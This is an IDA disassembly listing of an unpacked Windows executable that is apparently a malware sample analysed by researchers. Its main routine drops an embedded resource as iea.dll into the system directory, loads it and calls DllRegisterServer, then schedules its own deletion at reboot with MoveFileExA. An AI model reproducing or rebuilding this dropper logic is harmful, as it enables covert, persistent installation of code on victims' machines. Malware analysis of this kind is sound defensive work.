;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 6C1A753C09C8CA5FDD377D22AB5A56CB
; File Name : u:\work\6c1a753c09c8ca5fdd377d22ab5a56cb_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00003D58 ( 15704.)
; Section size in file : 00003D58 ( 15704.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: WinMain(x,x,x,x)+6C�p
arg_0 = dword ptr 4
arg_4 = word ptr 8
arg_8 = dword ptr 0Ch
movzx eax, [esp+arg_4]
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
push 0Ah
push eax
push esi
call ds:dword_405018 ; FindResourceA
mov edi, eax
push edi
push esi
call ds:dword_405014 ; LoadResource
push edi
push esi
mov ebx, eax
call ds:dword_405010 ; SizeofResource
push ebx
mov edi, eax
call ds:dword_40500C ; LockResource
mov ecx, [esp+0Ch+arg_8]
push 0
push 80h
push 2
push 0
push 1
push 0C0000000h
push ecx
mov ebx, eax
call ds:dword_405008 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_401074
push 0
lea edx, [esp+10h+arg_4]
push edx
push edi
push ebx
push esi
call ds:dword_405004 ; WriteFile
test eax, eax
push esi
jnz short loc_40107A
call ds:dword_405000 ; CloseHandle
loc_401074: ; CODE XREF: sub_401000+57�j
pop edi
pop esi
xor al, al
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40107A: ; CODE XREF: sub_401000+6C�j
call ds:dword_405000 ; CloseHandle
pop edi
pop esi
mov al, 1
pop ebx
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+186�p
var_310 = byte ptr -310h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
hInstance = dword ptr 4
hPrevInstance = dword ptr 8
lpCmdLine = dword ptr 0Ch
nShowCmd = dword ptr 10h
sub esp, 310h
mov eax, dword_407030
push esi
mov [esp+314h+var_4], eax
push 104h
lea eax, [esp+318h+var_108]
push eax
push 0
call ds:dword_405038 ; GetModuleFileNameA
push 104h
lea ecx, [esp+318h+var_20C]
push ecx
call ds:dword_405034 ; GetSystemDirectoryA
push 104h
lea edx, [esp+318h+var_20C]
push edx
lea eax, [esp+31Ch+var_310]
push eax
call ds:dword_405030 ; lstrcpyn
push offset aIea_dll ; "\\iea.dll"
lea ecx, [esp+318h+var_310]
push ecx
call ds:dword_40502C ; lstrcat
lea edx, [esp+314h+var_310]
push edx
push 65h
push 0
call sub_401000
add esp, 0Ch
lea eax, [esp+314h+var_310]
push eax
call ds:dword_405028 ; LoadLibraryA
mov esi, eax
push offset aDllregisterser ; "DllRegisterServer"
push esi
call ds:dword_405024 ; GetProcAddress
test eax, eax
jz short loc_401123
call eax
loc_401123: ; CODE XREF: WinMain(x,x,x,x)+8F�j
push esi
call ds:dword_405020 ; FreeLibrary
push 4
push 0
lea ecx, [esp+31Ch+var_108]
push ecx
call ds:dword_40501C ; MoveFileExA
mov ecx, [esp+314h+var_4]
xor eax, eax
pop esi
call sub_401185
add esp, 310h
retn 10h
_WinMain@16 endp
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_401185. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_401171 proc near ; DATA XREF: .rdata:stru_405130�o
xor eax, eax
inc eax
retn
sub_401171 endp
; =============== S U B R O U T I N E =======================================
sub_401175 proc near ; DATA XREF: .rdata:stru_405130�o
mov esp, [ebp-18h]
sub_401175 endp ; sp-analysis failed
; [0000000D BYTES: COLLAPSED CHUNK OF FUNCTION sub_401185. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION sub_401185. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___security_error_handler: ; CODE XREF: sub_401185-1D�p
push 118h
push offset stru_405338
call __SEH_prolog
mov eax, dword_407030
mov [ebp-1Ch], eax
mov eax, dword_4072AC
xor ecx, ecx
cmp eax, ecx
jz short loc_40143B
mov [ebp-4], ecx
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call eax
pop ecx
pop ecx
; START OF FUNCTION CHUNK FOR sub_401436
loc_401429: ; CODE XREF: sub_401436+3�j
or dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_40153A
; END OF FUNCTION CHUNK FOR sub_401436
; =============== S U B R O U T I N E =======================================
sub_401432 proc near ; DATA XREF: .rdata:stru_405338�o
xor eax, eax
inc eax
retn
sub_401432 endp
; =============== S U B R O U T I N E =======================================
sub_401436 proc near ; DATA XREF: .rdata:stru_405338�o
; FUNCTION CHUNK AT 00401429 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0040153A SIZE 00000007 BYTES
mov esp, [ebp-18h]
jmp short loc_401429
sub_401436 endp
; ---------------------------------------------------------------------------
loc_40143B: ; CODE XREF: .text:0040141A�j
mov eax, [ebp+8]
dec eax
jz short loc_401457
mov edi, offset aUnknownSecurit ; "Unknown security failure detected!"
mov dword ptr [ebp-128h], offset aASecurityError ; "A security error of unknown cause has b"...
mov esi, 0D4h
jmp short loc_40146B
; ---------------------------------------------------------------------------
loc_401457: ; CODE XREF: .text:0040143F�j
mov edi, offset aBufferOverrunD ; "Buffer overrun detected!"
mov dword ptr [ebp-128h], offset aABufferOverrun ; "A buffer overrun has been detected whic"...
mov esi, 0B9h
loc_40146B: ; CODE XREF: .text:00401455�j
mov [ebp-20h], cl
push 104h
lea eax, [ebp-124h]
push eax
push ecx
call ds:dword_405038 ; GetModuleFileNameA
test eax, eax
jnz short loc_401498
push offset Source ; "<program name unknown>"
lea eax, [ebp-124h]
push eax
call _strcpy
pop ecx
pop ecx
loc_401498: ; CODE XREF: .text:00401483�j
lea ebx, [ebp-124h]
mov eax, ebx
push eax
call _strlen
pop ecx
add eax, 0Bh
cmp eax, 3Ch
jbe short loc_4014D4
mov eax, ebx
push eax
call _strlen
mov ebx, eax
lea eax, [ebp-124h]
sub eax, 31h
add ebx, eax
push 3
push offset a___ ; "..."
push ebx
call _strncpy
add esp, 10h
loc_4014D4: ; CODE XREF: .text:004014AD�j
push ebx
call _strlen
pop ecx
lea eax, [eax+esi+0Ch]
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov [ebp-18h], esp
mov esi, esp
push edi
push esi
call _strcpy
mov edi, offset asc_405180 ; "\n\n"
push edi
push esi
call _strcat
push offset aProgram ; "Program: "
push esi
call _strcat
push ebx
push esi
call _strcat
push edi
push esi
call _strcat
push dword ptr [ebp-128h]
push esi
call _strcat
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push esi
call ___crtMessageBoxA
add esp, 3Ch
; START OF FUNCTION CHUNK FOR sub_401436
loc_40153A: ; CODE XREF: sub_401436-9�j
push 3 ; Code
call __exit
; END OF FUNCTION CHUNK FOR sub_401436
; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
; [00000030 BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402154 proc near ; CODE XREF: start:loc_4012AB�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_405728
call __SEH_prolog
mov [ebp+var_1C], offset dword_405DBC
loc_402167: ; CODE XREF: sub_402154+3C�j
cmp [ebp+var_1C], offset dword_405DBC
jnb short loc_402192
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_402188
call eax
jmp short loc_402188
; ---------------------------------------------------------------------------
loc_402181: ; DATA XREF: .rdata:stru_405728�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_402185: ; DATA XREF: .rdata:stru_405728�o
mov esp, [ebp+ms_exc.old_esp]
loc_402188: ; CODE XREF: sub_402154+27�j
; sub_402154+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_402167
; ---------------------------------------------------------------------------
loc_402192: ; CODE XREF: sub_402154+1A�j
call __SEH_epilog
retn
sub_402154 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_402198()
sub_402198 proc near ; DATA XREF: __cinit:loc_401704�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_405738
call __SEH_prolog
mov [ebp+var_1C], offset dword_405DC4
loc_4021AB: ; CODE XREF: sub_402198+3C�j
cmp [ebp+var_1C], offset dword_405DC4
jnb short loc_4021D6
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_4021CC
call eax
jmp short loc_4021CC
; ---------------------------------------------------------------------------
loc_4021C5: ; DATA XREF: .rdata:stru_405738�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4021C9: ; DATA XREF: .rdata:stru_405738�o
mov esp, [ebp+ms_exc.old_esp]
loc_4021CC: ; CODE XREF: sub_402198+27�j
; sub_402198+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_4021AB
; ---------------------------------------------------------------------------
loc_4021D6: ; CODE XREF: sub_402198+1A�j
call __SEH_epilog
retn
sub_402198 endp
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_407170
jmp short loc_40272C
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
__allmul:
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_404CB9
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_404CB9: ; CODE XREF: .text:00404CAE�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D52 proc near ; CODE XREF: __global_unwind2+13�p
jmp ds:dword_4050A4
sub_404D52 endp
_text ends
; Section 2. (virtual address 00005000)
; Virtual size : 000012EE ( 4846.)
; Section size in file : 000012EE ( 4846.)
; Offset to raw data for section: 00005000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 405000h
dword_405000 dd 77E77963h ; DATA XREF: sub_401000+6E�r
; sub_401000:loc_40107A�r
dword_405004 dd 77E79D8Ch ; DATA XREF: sub_401000+63�r
; __NMSG_WRITE+155�r
dword_405008 dd 77E7A837h ; DATA XREF: sub_401000+4C�r
dword_40500C dd 77E7C931h ; DATA XREF: sub_401000+2D�r
dword_405010 dd 77E7105Fh ; DATA XREF: sub_401000+24�r
dword_405014 dd 77E760B5h ; DATA XREF: sub_401000+1A�r
dword_405018 dd 77E6CA8Ah ; DATA XREF: sub_401000+10�r
dword_40501C dd 77E645E4h ; DATA XREF: WinMain(x,x,x,x)+A6�r
dword_405020 dd 77E80618h ; DATA XREF: WinMain(x,x,x,x)+94�r
dword_405024 dd 77E7A5FDh ; DATA XREF: WinMain(x,x,x,x)+87�r
; unknown_libname_1+15�r ...
dword_405028 dd 77E805D8h ; DATA XREF: WinMain(x,x,x,x)+79�r
; ___crtMessageBoxA+18�r
dword_40502C dd 77E74155h ; DATA XREF: WinMain(x,x,x,x)+5D�r
dword_405030 dd 77E73BEFh ; DATA XREF: WinMain(x,x,x,x)+4D�r
dword_405034 dd 77E704FCh ; DATA XREF: WinMain(x,x,x,x)+35�r
dword_405038 dd 77E7A099h ; DATA XREF: WinMain(x,x,x,x)+22�r
; .text:0040147B�r ...
dword_40503C dd 77E75CB5h ; DATA XREF: sub_401185-7�r
; unknown_libname_1+29�r
dword_405040 dd 77E79F93h ; DATA XREF: start+6D�r
; unknown_libname_1+5�r
dword_405044 dd 77E6177Ah ; DATA XREF: start+160�r __ioinit+57�r
dword_405048 dd 77E7C938h ; DATA XREF: start:loc_4012C4�r
dword_40504C dd 77E7C657h ; DATA XREF: start+20�r
dword_405050 dd 77E802FCh ; DATA XREF: ___security_init_cookie+43�r
dword_405054 dd 77E7751Ah ; DATA XREF: ___security_init_cookie+37�r
dword_405058 dd 77E77CC4h ; DATA XREF: ___security_init_cookie+2F�r
dword_40505C dd 77E80656h ; DATA XREF: ___security_init_cookie+27�r
dword_405060 dd 77E6167Bh ; DATA XREF: ___security_init_cookie+1B�r
dword_405064 dd 77E616B4h ; DATA XREF: _doexit+1A�r
dword_405068 dd 77E79C90h ; DATA XREF: _doexit+13�r
dword_40506C dd 77E79C3Dh ; DATA XREF: __NMSG_WRITE+14E�r
; __ioinit+157�r
dword_405070 dd 77EB9A84h ; DATA XREF: __XcptFilter+167�r
dword_405074 dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+113�r
dword_405078 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_401F5E�r
dword_40507C dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+C1�r
dword_405080 dd 77E79924h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_401EF6�r
; ___crtLCMapStringA+22D�r ...
dword_405084 dd 77F5157Dh ; DATA XREF: ___crtGetEnvironmentStringsA:loc_401EB7�r
; ___crtLCMapStringA:loc_403F43�r ...
dword_405088 dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+B�r
dword_40508C dd 77E7C931h ; DATA XREF: __ioinit+19C�r
dword_405090 dd 77E78406h ; DATA XREF: __ioinit+FE�r
; __ioinit+165�r
dword_405094 dd 77E76E0Bh ; DATA XREF: __heap_init+44�r
dword_405098 dd 77E7C726h ; DATA XREF: __heap_init+11�r
dword_40509C dd 77E79E34h ; DATA XREF: ___sbh_free_block+22F�r
dword_4050A0 dd 77F51597h ; DATA XREF: _free+30�r
; ___sbh_free_block+2B4�r ...
dword_4050A4 dd 77F6183Eh ; DATA XREF: sub_404D52�r
dword_4050A8 dd 77E775F1h ; DATA XREF: __ValidateEH3RN+131�r
; __ValidateEH3RN+196�r ...
dword_4050AC dd 77E7F044h ; DATA XREF: __ValidateEH3RN+B3�r
; __resetstkoflw+1A�r ...
dword_4050B0 dd 77E7A13Fh ; DATA XREF: __setmbcp+42�r
dword_4050B4 dd 77E6C703h ; DATA XREF: __setmbcp+2B�r
dword_4050B8 dd 77E7849Fh ; DATA XREF: _setSBUpLow+1C�r
; __setmbcp+93�r ...
dword_4050BC dd 77F516F8h ; DATA XREF: __heap_alloc+3E�r
; ___sbh_heap_init+D�r ...
dword_4050C0 dd 77E7980Ah ; DATA XREF: ___sbh_alloc_new_region+7E�r
; ___sbh_alloc_new_group+52�r ...
dword_4050C4 dd 77F5722Fh ; DATA XREF: ___sbh_alloc_new_region+27�r
; _realloc+FD�r ...
dword_4050C8 dd 77F522F2h ; DATA XREF: __msize+30�r
dword_4050CC dd 77E77405h ; DATA XREF: ___crtLCMapStringA+2C3�r
; ___crtLCMapStringA+344�r ...
dword_4050D0 dd 77E77CCEh ; DATA XREF: ___crtLCMapStringA+C0�r
; ___crtLCMapStringA+141�r ...
dword_4050D4 dd 77E781F9h ; DATA XREF: ___crtLCMapStringA+27�r
; ___crtLCMapStringA+15B�r ...
dword_4050D8 dd 77E641EBh ; DATA XREF: ___crtGetStringTypeA+19C�r
dword_4050DC dd 77E7C866h ; DATA XREF: ___crtGetStringTypeA+24�r
; ___crtGetStringTypeA+128�r
dword_4050E0 dd 77E7513Ch ; DATA XREF: ___ansicp+20�r
dword_4050E4 dd 77E6169Ah ; DATA XREF: __resetstkoflw+D5�r
dword_4050E8 dd 77E7C3A5h ; DATA XREF: __resetstkoflw+2B�r
dd 2 dup(0)
aF db '#`(F',0
align 4
dd 2, 52h, 2 dup(5D50h)
aDllregisterser db 'DllRegisterServer',0 ; DATA XREF: WinMain(x,x,x,x)+81�o
align 10h
aIea_dll db '\iea.dll',0 ; DATA XREF: WinMain(x,x,x,x)+53�o
align 10h
stru_405130 _msEH <0FFFFFFFFh, offset sub_401171, offset sub_401175>
; DATA XREF: sub_401185-2F�o
align 10h
stru_405140 _msEH <0FFFFFFFFh, offset loc_40135A, offset loc_40136E>
; DATA XREF: start+2�o
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: .text:0040152C�o
; __NMSG_WRITE+123�o
align 4
aProgram db 'Program: ',0 ; DATA XREF: .text:00401502�o
align 10h
; char asc_405180[]
asc_405180 db 0Ah ; DATA XREF: .text:004014F6�o
; __NMSG_WRITE+107�o
db 0Ah,0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: .text:004014C6�o
; __NMSG_WRITE+C1�o
; char Source[]
Source db '<program name unknown>',0 ; DATA XREF: .text:00401485�o
; __NMSG_WRITE+8E�o
align 10h
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: .text:0040145C�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: .text:loc_401457�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: .text:00401446�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: .text:00401441�o
align 4
stru_405338 _msEH <0FFFFFFFFh, offset sub_401432, offset sub_401436>
; DATA XREF: .text:004013FF�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1�o
aRuntimeError db 'runtime error ',0
align 10h
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 8
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_407044�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5�o
db 0Ah
db 'Program: ',0
word_405722 dw 0 ; DATA XREF: __wincmdln+1B�o
align 8
stru_405728 _msEH <0FFFFFFFFh, offset loc_402181, offset loc_402185>
; DATA XREF: sub_402154+2�o
align 8
stru_405738 _msEH <0FFFFFFFFh, offset loc_4021C5, offset loc_4021C9>
; DATA XREF: sub_402198+2�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62�o
align 4
